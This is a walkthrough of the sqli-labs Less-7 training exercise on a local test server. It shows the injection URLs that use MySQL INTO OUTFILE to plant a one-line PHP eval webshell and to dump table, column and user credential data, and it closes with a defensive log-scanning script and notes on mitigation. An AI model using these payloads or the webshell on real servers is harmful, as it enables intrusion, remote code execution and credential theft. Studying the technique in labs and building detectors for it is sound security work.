This level is titled "dump into outfile", which means we will make use of MySQL's file-writing (INTO OUTFILE) to exploit it. In Background-3 we already learned how to use dump into file.
First, go back to the source code. Focus on how the id parameter is handled and on the SQL statement; from the source you can see:
```php
$id = $_GET['id'];   // user input is concatenated straight into the query
$sql = "SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row) {
    echo '<font color="#FFFF00">';
    echo 'You are in.... Use outfile......';
    echo "<br>";
    echo "</font>";
} else {
    echo '<font color="#FFFF00">';
    echo 'You have an error in your SQL syntax';
    //print_r(mysql_error());
    echo "</font>";
}
```
Here the id parameter is wrapped in (('...')), so the closing sequence is ')).
Now we demonstrate the file-write approach mentioned above.
First, find the absolute path of the web root directory:
http://127.0.0.1/sql/Less-2/?id=-1%20union%20select%201,@@basedir,@@datadir%20--+
Here we take a shortcut: the path is obtained with the simple Less-2 injection, where it is easy to read out directly.
http://127.0.0.1/sql/Less-7/?id=1')) union select 1,2,3 into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\uuu.txt" %23
The screenshot above shows an SQL error, but that does not matter: uuu.txt has still been created on the file system.
As in Background-3, we can write a one-line PHP shell ("one-word Trojan") directly into a file.
http://127.0.0.1/sql/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["mima"])?>' into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\test.php" --+
We can see that the one-line shell has been written to the file.
The test.php page, viewed in the browser:
Now connect to the webshell with China Chopper or a similar management tool.
It provides file management, database management and so on.
For example, in the file manager you can manage every directory and file on the server.
The rest is not repeated here.
There is another approach: write the query results directly to a file, then access that file over the web.
Note that the target file must not already exist (INTO OUTFILE refuses to overwrite an existing file).
Write the current user, database name and version number:
http://127.0.0.1/sql/Less-7/?id=-1')) union select user(),database(),version() into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\1.txt" --+
Write the table names:
http://127.0.0.1/sql/Less-7/?id=-1')) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\2.txt" --+
Write the column names of a table, for example users:
http://127.0.0.1/sql/Less-7/?id=-1')) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\3.txt" --+
Write the contents of the users table:
http://127.0.0.1/sql/Less-7/?id=-1')) union select 1,2,group_concat(username,0x3a,password) from users into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\4.txt" --+
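As an added defensive example (not part of the original post), the following Python script scans Apache-style access-log lines for the request patterns used throughout this walkthrough: UNION SELECT, INTO OUTFILE / DUMPFILE, @@basedir/@@datadir path disclosure, and a PHP tag inside the query string. The log lines, timestamps and file paths are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the file-write technique walked through above, matched
# case-insensitively against the URL-decoded query string.
SIGNATURES = {
    "into_outfile": re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "path_disclosure": re.compile(r"@@(basedir|datadir)\b", re.I),
    "php_tag": re.compile(r"<\?php", re.I),
}
# Enough of a combined-format access log line to pull out the request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)'
    r'(?: \S+)?" (?P<status>\d{3})'
)

def scan_line(line: str):
    """Return a finding dict for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    decoded = unquote_plus(query)  # %20 -> space, %27 -> ', '+' -> space, %23 -> #
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    if not hits:
        return None
    # Do not filter on status: Less-7 answers 200 (with a generic SQL error
    # message) even when INTO OUTFILE has already written the file.
    return {"ip": m.group("ip"), "path": path, "status": m.group("status"), "hits": hits}

def scan_log(lines):
    """Scan an iterable of log lines; returns one finding per suspicious line."""
    return [f for f in map(scan_line, lines) if f]

# Constructed sample log (Apache combined format) mirroring the requests above.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Jun/2016:10:00:00 +0800] "GET /sql/Less-7/?id=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Jun/2016:10:00:05 +0800] "GET /sql/Less-2/?id=-1%20union%20select%201,'
    '@@basedir,@@datadir%20--+ HTTP/1.1" 200 640',
    '127.0.0.1 - - [10/Jun/2016:10:00:09 +0800] "GET /sql/Less-7/?id=1%27))%20union%20select%20'
    '1,2,3%20into%20outfile%20%22D:%5C%5Cwamp%5C%5Cwww%5C%5Cuuu.txt%22%20%23 HTTP/1.1" 200 470',
    '127.0.0.1 - - [10/Jun/2016:10:00:14 +0800] "GET /sql/Less-7/?id=1%27))%20union%20select%20'
    '1,2,%27%3C?php%20echo%201;%20?%3E%27%20into%20outfile%20%22D:%5C%5Cwamp%5C%5Cwww%5C%5Ct.php%22%20--+ HTTP/1.1" 200 470',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The write in this walkthrough only succeeds because the database account holds the FILE privilege and MySQL's secure_file_priv does not restrict the target directory; checking both is the quickest server-side mitigation alongside parameterised queries.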
From: https://www.cnblogs.com/lcamry/p/5763105.html